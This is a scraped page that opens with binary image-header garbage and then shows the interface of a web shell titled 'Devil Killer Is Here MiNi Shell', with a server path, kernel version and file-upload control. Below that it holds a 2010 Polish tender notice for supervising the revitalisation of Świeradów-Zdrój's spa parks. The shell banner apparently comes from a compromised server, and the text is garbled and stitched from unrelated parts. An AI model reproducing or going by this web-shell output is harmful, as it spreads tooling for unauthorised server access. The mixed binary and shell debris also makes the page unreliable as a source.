JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100216/43450-N-2010.html

<p class="kh_header"><b>Świeradów-Zdrój: Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn. Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju</b><br>
<b>Numer ogłoszenia: 43450 - 2010; data zamieszczenia: 16.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn. Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usługi  pn.: Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn. Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju , w zakresie następujących branż :
- architektonicznej bez ograniczeń, 
- konstrukcyjno-budowlanej bez ograniczeń,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń 
-  kształtowania  i pielęgnacji terenów zieleni.
2. Zadanie inwestycyjne realizowane będzie  w ramach  umowy dotyczącej następujących części i zadań:
Część I   Pełnienie nadzoru inwestorskiego przy  Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju, część I
Nadzór inwestorski na n/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
Zadanie 1. Budowa oświetlenia parkowego
Planowane jest usunięcie istniejącego oświetlenia i wybudowanie na jego miejscu nowego systemu oświetlenia parkowego. Planuje się montaż szafek oświetleniowych (3 szt.), wykonanie wykopów pod kable ziemne (dł. ok. 3350m), wykonanie nowej linii kablowej zasilającej słupy oświetleniowe z oprawami YAKY 4x25 mm2 (dł, ok. 3600) montaż fundamentów B-40 - 131 szt., montaż i postawienie nowych słupów oświetleniowych typu SM-1W/E (kolor grafitowy lub czarny) z wysięgnikiem WTM-20/1 - 131 szt., montaż nowych opraw oświetleniowych typu OW- S-70 W 400 - 131 szt., montaż kloszy - klosz typu Szyszka malowany na kolor biały - 131 szt.(wg wzoru wskazanego w Opisie urządzeń)

Zadanie 2. Budowa fontanny wraz z przebudową nawierzchni placu
W zakres ww. zadania wchodzi rozbiórka istniejącej nawierzchni oraz elementów małej architektury, wycinka drzew i krzewów  oraz likwidacja trawników z murkami oporowymi. Następnie przewiduje się wykonanie warstw konstrukcyjnych pod nawierzchnię z kostki i płyt granitowych (pow. ok. 850 m2) oraz przyłączy studzienek kanalizacji deszczowej. Kolejnym etapem prac będzie budowa fontanny (śr. 9,7 m) wraz ze wszystkimi niezbędnymi przyłączami (elektrycznym, wodociągowym i deszczowym) oraz studzienką technologiczną, montaż oświetlenia placu (3szt.) wg wzoru wskazanego w Opisie urządzeń, wykonanie i montaż elementów małej architektury (schody kamienne ławki, kosze na śmieci) wg wzoru wskazanego w Opisie urządzeń, wykonanie nowej zieleni urządzonej (kwietniki, krzewy ozdobne, drzewka ozdobne).

Część II  
Pełnienie nadzoru inwestorskiego przy  Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju, część II

Nadzór inwestorski na n/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:

Zadanie 1. Rewitalizacja układu komunikacyjnego 
Planowane jest przeprowadzenie rozbiórki istniejącej nawierzchni bitumicznej alejek parkowych oraz fontanny wraz przyłączami i postumentów betonowych, budowa w ich miejscu nowych ścieżek parkowych o nawierzchni mineralnej (o szer. 2,5m) ograniczonych krawężnikiem z kostki granitowej (9x9cm) układanej w dwóch rzędach. Ponadto przebudowie i renowacji zostaną poddane istniejące schody ze stopniami i spocznikami z granitu wraz z balustradami (kamienne) - TYP I oraz zostaną wybudowane schody terenowe ze stopniami z piaskowca, ograniczone kostką granitową; przestrzeń pomiędzy stopniami wypełniona  nawierzchnią mineralną - TYP II. Również przebudowie i renowacji ulegnie posadzka tarasu dolnego - istniejącą posadzkę z płyt piaskowca należy zdemontować (ok. 1200 m2), wykonać nową podbudowę, niespękany kamień oczyścić, ubytki uzupełnić (ok. 20% powierzchni tarasu), ułożyć według istniejącego wzoru i zabezpieczyć preparatem hydrofobizującym oraz antygraffiti. Podobny charakter prac renowacyjnych przewidziany jest dla placu eliptycznego - część środkowa - szachownica - istniejącą posadzkę z płyt kamiennych należy zdemontować , wykonać nową podbudowę, niespękany kamień oczyścić, ubytki uzupełnić (ok. 20% powierzchni szachownicy), ułożyć według istniejącego wzoru, zabezpieczyć preparatem hydrofobizującym oraz antygraffiti. Części boczne placu eliptycznego, tzn. dywanik bitumiczny, zdemontować i wykonać nawierzchnię naturalną; istniejące balustrady kamienne również oczyścić, wymienić spękane elementy, uzupełnić spoiny oraz zabezpieczyć preparatem hydrofobizującym oraz antygraffiti. Mur oporowy (pomiędzy górny a dolnym tarasem) wraz balustradami oczyścić (czyszczenie strumieniowo-ścierne), uzupełnić oraz wymienić spękane elementy, uzupełnić braki w spoinowaniu płyt kamiennych, zabezpieczyć preparatem hydrofobizującym oraz antygraffiti. Mostki kamienne wraz z murkami oporowymi  oczyścić, posadzkę na odcinku mostka zdemontować i wykonać na jej miejsce posadzkę z kostki granitowej (5x5 cm- żółta). Pozostałe murki oporowe oraz elementy małej architektury także oczyścić i zabezpieczyć.

Zadanie 2. Rewitalizacja elementów małej architektury
Planowane jest ustawienie 114 ławek wzdłuż ciągów pieszych oraz na tarasach i placach (według wskazań planu zagospodarowania). Ławki mocowane na stałe za pomocą kołków do stóp fundamentowych (70x15x40 cm), przy czym 103 ławki według wzoru wskazanego w Opisie urządzeń, pozostałych 11 ławek również według wzoru wskazanego ww. opisu.
Przewiduje się również ustawienie dwóch tablic informacyjnych z planem oraz regulaminem korzystania z parku. Tablice montowane na stałe za pomocą kołków do stóp fundamentowych (30x30x100 cm). Tablica według wzoru wskazanego  w Opisie urządzeń
Zamontowane zostaną również kosze na śmieci (52 szt.)  przy wejściach, skrzyżowaniach alejek parkowych i innych charakterystycznych punktach. Kosze mocowane na stałe - słupki posiadają przedłużony element stalowy z kotwami do zabetonowania w gruncie. Kosze według wzoru wskazanego w Opisie urządzeń.
Przewiduje się instalację tabliczek dydaktycznych (30 szt.) w pobliżu bardziej okazałej i rzadkiej roślinności z nazwami gatunków w trzech językach. Tabliczki należy wykonać według wzoru wskazanego w Opisie urządzeń.

Zadanie 3. Uzupełnienie szaty roślinnej
Planowane jest usunięcie drzew chorych, zniszczonych i zniekształcających kompozycję; prace pielęgnacyjne i zabezpieczające starodrzew, w tym cięcia drzew nad ciągami komunikacyjnymi; likwidację starych, chaotycznie rozmieszczonych i pojedynczych krzewów; otwarcie okien widokowych z charakterystycznych punktów; całkowitą wymianą kulistych i strzyżonych drzew na tarasach i wokół Domu Zdrojowego na inne gatunki i ich kuliste odmiany; uzupełnienie i urozmaicenie szaty roślinnej pojedynczymi drzewami, grupami krzewów o charakterze osłonowo-okrywowym, roślinami okrywowymi i żywotnymi bylinami; obsadzenie brzegów zbiorników roślinami nadbrzeżnymi; renowację najbardziej zniszczonych fragmentów trawników w niezbędnym zakresie oraz ich uzupełnienie w miejscach karczunków drzew i  krzewów.

Zadanie 4. Uporządkowanie cieków wodnych w parkach uzdrowiskowych
Ciek w górnym parku - istniejący ciek rozebrać i w jego miejsce wykonać nowy z kamienia częściowo oszlifowanego (obrobionego jednostronnie) o szerokości 1,5 m u góry i 0,5 m na dnie oraz zagłębieniu ok. 0,6 m. Przepust na ścieżce należy rozebrać i wykonać nowy wykorzystując rury betonowe (O 600) o dużym zagęszczeniu betonu. Ponadto należy wykonać nowe ścianki oporowe dla przedmiotowego przepustu. Również konieczne jest podłączenie do cieku dwóch istniejących wylotów rurowych przez wstawienie rur PVC (dł. ok. 5m), a następnie ich przysypanie żwirem i wydobytym urobkiem. Stawek górny rozebrać i wykonać nową zaporę przelewową i końcową, oczyścić dno z osadów i wykonać nowe z kostki granitowej (20x20 cm). Stawek dolny - oczyścić i pogłębić do ok. 0,5 m, wykonać nowe dno z kostki granitowej (20x20 cm). Ponadto należy oczyścić  z glonów i darni obudowę studni uzupełniając ubytki w jej kamiennej obudowie. Wymagane jest również rozebranie i wykonanie od nowa obudowy wylotu, należy wstawić nowe ceowniki i wyposażyć w nowe deski zastawkowe.
Ciek w dolnym parku - należy uzupełnić braki w obudowie kamiennej cieku według potrzeb. Ponadto wymagane jest doprowadzenie dodatkowej ilości wody do przedmiotowego cieku poprzez połączenie go z istniejącym kolektorem rurociągiem z rur PVC (Dn 315 - dł. rurociągu - ok. 104 m). Niezbędnym jest wykonanie remontu istniejącej studzienki, do której podłączony zostanie projektowany rurociąg. Ponadto na przedmiotowym kanale zaprojektowane jest wykonanie trzech studni rewizyjnych - dwóch z kręgów betonowych (O 1200) - na początku i końcu kanału oraz jednej na trasie z PVC (O 425). Na końcu cieku należy wykonać renowację istniejącego zalewu, tj. rozebrać część murów oporowych i wykonać je od nowa (ok. 1 m); zalew (skarpy i dno) oczyścić z narzutu, glonów i mchów oraz porostów; uzupełnić braki w obudowie kamiennej; całe dno wykonać z kostki granitowej na ławie betonowej gr. 10 cm i cemencie; oczyścić obudowę wylotu, wstawić nowe ceowniki i wyposażyć w nowe deski zastawkowe.


Roboty budowlane winny być wykonane zgodnie z zamieszczoną dokumentacją w postępowaniu nr OR.ZP1.340-04/10 Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju (nr ogłoszenia 23924 z dnia 27.01.2010r.), umowami zawartymi z Wykonawcami przedmiotowych robót budowlanych.






3.1 Zakres usługi  obejmuje pełny zakres czynności jaki dla inspektora nadzoru przewiduje ustawa z dnia 07.07.1994r. Prawo budowlane Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm.). i będzie realizowany w branżach: 
- architektonicznej bez ograniczeń, 
- konstrukcyjno-budowlanej bez ograniczeń,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń .

3.2 Ponadto zakres usług obejmuje nadzór nad robotami polegającymi na  kształtowaniu  i pielęgnacji terenów zieleni, poprzez:
-reprezentowanie Zamawiającego  na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;
- sprawdzanie jakości wykonywanych robót i  zastosowanych materiałów/wyrobów , a w  szczególności zapobieganie zastosowaniu  materiałów wadliwych, niepełnowartościowych;
- 	sprawdzanie i odbiór robót  ulegających zakryciu lub zanikających, uczestniczenie w  odbiorach oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów i przekazywanie ich do użytkowania;
-potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy.
4. W przypadku niejasności w zakresie praw i obowiązków Zleceniobiorcy ustala się, iż celem niniejszej usługi jest stworzenie całościowego efektywnego systemu nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: Rewitalizacja kompleksu parków uzdrowiskowych w Świeradowie-Zdroju. Zleceniobiorca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować inwestycje tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji inwestycji, w szczególności: 
a) reprezentowanie Zamawiającego na placu budowy poprzez sprawowanie kontroli zgodności realizacji zadania inwestycyjnego, z obowiązującymi przepisami i polskimi normami, zasadami wiedzy technicznej, z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, pozwoleniem na budowę, decyzją środowiskową, umową o dofinansowanie zawartą między Zamawiającym a Zarządem Województwa Dolnośląskiego, umowami o wykonanie robót budowlanych, dotyczącymi  części: I i II zadania inwestycyjnego zawartymi pomiędzy Zamawiającym a Wykonawcami, 
b) sprawdzanie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowaniu wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie; wszelkie zastosowane materiały budowlane na zadaniu inwestycyjnym muszą być nowe oraz odpowiadać co do jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. , Nr 92, poz. 881), a także wymaganiom jakościowym określonym w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji Projektowej.
c) koordynacja robót poszczególnych branż,
d) sprawdzanie i odbiór robót ulegających zakryciu lub zanikowi, uczestniczenie w próbach, badaniach, oględzinach oraz przygotowanie i udział w czynnościach przekazania placu budowy, odbiorów częściowych i odbiorów  końcowych,
e) potwierdzenie faktycznie wykonanych robót, usunięcia wad oraz kontrolowanie rozliczeń budowy,
f) kontrola prawidłowości prowadzenia Dziennika Budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
g) rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót a w razie potrzeby zaciągania opinii autora projektu,
h) stwierdzanie gotowości do odbiorów robót zanikowych, odbiorów częściowych i końcowych wpisem do Dziennika Budowy oraz pisemne poinformowanie o tym fakcie Zamawiającego.
i) potwierdzanie faktycznie wykonanego zakresu robót jako podstawy do fakturowania częściowego zgodnie z postanowieniami umowy zawartej pomiędzy Zamawiającym a Wykonawcami,
j) sprawdzanie pod względem zasadności wykonania, obmiaru oraz kontroli merytorycznej i rachunkowej wycen robót dodatkowych/uzupełniających, przedstawianie do zatwierdzania protokołów konieczności robót dodatkowych/uzupełniających - wprowadzanie ich do realizacji po uzyskaniu akceptacji projektanta (rysunki zamienne lub wpis do Dziennika Budowy) i Zamawiającego (umowa na roboty dodatkowe/uzupełniające);kompletowanie protokołów nadzoru autorskiego, kompletowanie  dokumentacji z naniesionymi  poprawkami  projektanta na dokumentacje projektowe, kompletowanie protokołów odbioru robót zanikowych, prób technicznych, itp. wynikających z prawa budowlanego i norm branżowych,
k) składanie comiesięcznych raportów o stanie zaawansowania inwestycji  oraz występujących trudnościach w realizacji zadania inwestycyjnego i odstępstwach od umów zawartych przez Zamawiającego z Wykonawcami w terminie do 5 - go dnia miesiąca za miesiąc poprzedni,
l) przygotowanie w imieniu Zamawiającego kompletu dokumentów oraz złożenie zawiadomienia o zakończeniu budowy do Powiatowego Inspektora Nadzoru Budowlanego w Lubaniu i przekazanie kopii wniosku Zamawiającemu z potwierdzona datą wpływu PINB i oświadczeniem o przyjęciu go bez zastrzeżeń,
ł) przygotowanie oraz przedłożenie Zamawiającemu w terminie 15 dni od daty podpisania protokołu końcowego budowy sprawozdania końcowego z realizacji inwestycji zgodnie z załącznikiem nr 1,
m) uczestniczenie w przeglądach wynikłych z rękojmi w terminach 12, 24, 36 miesięcy od dnia rozpoczęcia okresów  rękojmi,
n) obowiązkowy udział w  radach budowy, nie częściej niż  dwa razy w miesiącu, w terminach wyznaczonych przez Zamawiającego. W okresie kiedy roboty budowlane nie będą wykonywane z powodu tzw. przerwy zimowej strony dopuszczają możliwość rzadszego organizowania rad budowy, jednak nie rzadziej niż to wynika z charakteru zawartej między stronami umowy i obowiązujących przepisów.
o) jeżeli w okresie realizacji robót zajdzie uzasadniona konieczność wykonania robót uzupełniających/dodatkowych niezbędnych do prawidłowego wykonania przedmiotu umowy Zleceniobiorca powinien niezwłocznie zawiadomić o tym fakcie Zamawiającego w formie sporządzonego protokołu konieczności wraz z uzasadnieniem i kosztorysem. Pisemna zgoda Zamawiającego będzie podstawą wszczęcia postępowania, o którym mowa w art. 67 ust. 5 lub 6 ustawy Prawo zamówień publicznych i zawarcia stosownej umowy z Wykonawcą i wykonania robót uzupełniających/dodatkowych.
5.1. Obowiązki o których mowa w pkt. 4 wykonywane będą poprzez pobyt koordynatora/inspektora nadzoru odpowiednio do potrzeb wynikających z toku budowy jednak nie rzadziej niż trzy razy w tygodniu w godzinach pracy Urzędu. Pobyt musi być udokumentowany wpisem do Dziennika Budowy i podpisem na liście obecności złożonym w siedzibie Zamawiającego wraz z ustnym przekazaniem informacji o stanie zaawansowania prac na placu budowy. 
5.2. W okresie kiedy roboty budowlane nie będą wykonywane z powodu tzw. przerwy zimowej strony dopuszczają możliwość rzadszego wizytowania placu budowy, jednak nie rzadziej niż to wynika z charakteru zawartej między stronami umowy i obowiązujących przepisów.
5.3. W przypadku wystąpienia na placu budowy sytuacji nieprzewidzianej Zamawiający zastrzega sobie prawo wezwania Zleceniobiorcy w formie e-mailowej wysłanej do godz. 12:00 dnia poprzedniego, do stawienia się do godz. 10:00 na placu budowy w pierwszym dniu roboczym po wysłaniu wezwania. Obowiązki o których mowa w niniejszym pkt. wykonywane będą bez dodatkowego wynagrodzenia, w ramach zawartej umowy ryczałtowej.
6. W przypadku wystąpienia robót uzupełniających/dodatkowych obowiązkiem Zleceniobiorcy będzie pełnienie nadzoru zgodnie z obowiązkami przewidzianymi w niniejszej umowie bez odrębnego wynagrodzenia. 
7. Ponadto Zleceniobiorca  zobowiązany będzie do będzie  do uczestnictwa  w przeglądach wynikłych z tytułu rękojmi za wady w terminach 12, 24, 36 miesięcy od dnia rozpoczęcia okresów z tytułu rękojmi za wady oraz  wynikających  z  konieczności złożenia  wyjasnień w związku ze złożenim przez Zamawiającego wniosków o  płatność oraz udzielenie  wyjaśnień, w tym w ramach prowadzonych kontroli i audytów , w okresie trwałości  projektu pn.: Rewitalizacja kompleksu parków uzdrowiskowych w  Świeradowie-Zdroju. 

8. Wymagany okres z tytułu rękojmi za wady na wykonane usługi  wynosi 36 miesięcy od dnia rozpoczęcia biegu terminu rękojmii rozumianego jako termin zatwierdzenia przez Zamawiającego protokołu końcowego odbioru robót budowlanych + 60 dni na realizacje obowiązków  wynikających  z umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 50% zamówienia podstawowego, polegających na powtórzeniu zamówienia tego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości : 4 800,00 zł  (słownie: cztery tysiące osiemset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.24 ustawy PZP. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych. W celu potwierdzenia, że Wykonawca spełnia warunek nr 2 należy przedłożyć Oświadczenie o spełnianiu warunków określonych w art. 24 ustawy Prawo Zamówień Publicznych. W celu potwierdzenia, że Wykonawca spełnia warunek nr 3 należy przedłożyć Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest, by Wykonawca wykonał dwie usługi, których przedmiotem było  sprawowanie nadzoru  inwestorskiego  przy zadaniu inwestycyjnym polegającym na budowie/przebudowie lub rewitalizacji terenów zieleni urządzonej, w tym jedna usługa realizowana była na obiekcie stanowiącym park o powierzchni min. 2 ha. Wykonawca spełni warunek nr 4a jeżeli przedłoży wykaz zgodne ze wzorem stanowiącym załącznik nr 4 do SIWZ wraz referencjami wystawionymi przez odbiorcę usług</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest, by Wykonawca dysponował osobami posiadającymi następujące kwalifikacje i uprawnienia: 
1) uprawnienia budowlane do nadzorowania robót budowlanych w specjalności architektonicznej bez ograniczeń, 2) uprawnienia budowlane do nadzorowania robót budowlanych w specjalności konstrukcyjno - budowlanej bez ograniczeń, 3) uprawnienia budowlane do nadzorowania robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń 4) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; 5) kwalifikacje w zakresie nadzorowania robót związanych z kształtowaniem i pielęgnacją terenów zieleni urządzonej, 1-4)członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa. Wykonawca spełni warunek nr 4b jeżeli przedłoży wykaz zgodne ze wzorem stanowiącym załącznik nr 5 do SIWZ i przedłoży oświadczenie zgodne ze wzorem stanowiącym załącznik nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
